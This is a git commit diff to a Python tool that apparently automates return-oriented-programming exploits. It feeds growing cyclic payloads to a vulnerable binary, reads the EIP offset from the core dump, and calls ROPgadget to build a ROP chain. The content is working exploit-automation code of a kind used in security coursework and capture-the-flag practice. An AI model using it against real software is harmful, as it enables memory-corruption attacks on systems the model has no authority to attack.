Cat, argparse, payload sizes, more graceful errors

Co-authored-by: Chris Gora <34940205+ChrisGora@users.noreply.github.com>
Co-authored-by: jack bond-preston <jackbondpreston@outlook.com>
This commit is contained in:
Liam Dalgarno 2020-11-25 16:17:36 +00:00
parent 5f8099dde0
commit 99cb451194

View File

@ -1,41 +1,69 @@
from pwnlib.elf.corefile import Coredump
from pwnlib.util.cyclic import cyclic, cyclic_find
from pwnlib.util.packing import pack
from pwnlib.tubes.process import process
from pwnlib.tubes.process import process, signal
import os
import subprocess
import argparse
import warnings
import ROPgadget.ropgadget
exec_name = "./vuln-32"
print(r'''
_ ___ _.--. ___ _____ ______ _____ ______ ______
\`.|\..----...-'` `-._.-'_.-'` / _ \ / ____| /\ |____ / ____| /\ | ____| ____|
/ ' ` , __.--' | | | |_ _| | / \ / / | / \ | |__ | |__
)/' _/ \ `-_, / | | | \ \/ / | / /\ \ / /| | / /\ \ | __| | __|
`-'" `"\_ ,_.-;_.-\_ ', | |_| |> <| |____ / ____ \ / / | |____ / ____ \| | | |____
_.-'_./ {_.' ; / \___//_/\_\\_____/_/ \_\/_/ \_____/_/ \_\_| |______|
{_.-``-' {_/
''')
def find_offset(exec_name):
# TODO: command line arguments
arg_parser = argparse.ArgumentParser(description="Run an automated ROP on an executable")
arg_parser.add_argument("exec_file", metavar="exec_file", type=str, help="The executable file to exploit")
arg_parser.add_argument("--core", "--c", metavar="core_file", type=str, help="The name of the generated core file")
args = arg_parser.parse_args()
exec_file = args.exec_file
core_file = args.core
def find_offset(exec_file, core_file):
input_file = "input.txt"
core_file = "./core"
os.remove(core_file)
try:
os.remove(core_file)
except:
pass
payload_size = 32
while payload_size <= 16384:
print(f"[🤔] Trying payload {payload_size}...")
# TODO Loop until a crash, increase payload size each iteration
with open(input_file, "wb") as f:
payload = cyclic(512)
f.write(payload)
with open(input_file, "wb") as f:
payload = cyclic(payload_size)
f.write(payload)
process([exec_name, input_file]).wait()
process([f"./{exec_file}", input_file]).wait()
core = Coredump('./core')
try:
core = Coredump(f"./{core_file}")
if core and pack(core.eip) in payload:
offset = cyclic_find(core.eip)
print(f"[😳] Found offset at {offset}!")
return offset
except FileNotFoundError:
pass
assert pack(core.eip) in payload
os.remove(input_file)
payload_size *= 2
raise BaseException("Failed to find offset")
os.remove(input_file)
return cyclic_find(core.eip)
offset = find_offset(exec_file, core_file)
offset = find_offset(exec_name)
# print("\t# Padding goes here") <-- search for this
# print("\tp = ''\n")
result = subprocess.run(["ROPgadget", "--binary", exec_name, "--ropchain"], stdout=subprocess.PIPE)
result = subprocess.run(["ROPgadget", "--binary", exec_file, "--ropchain"], stdout=subprocess.PIPE)
stdout = result.stdout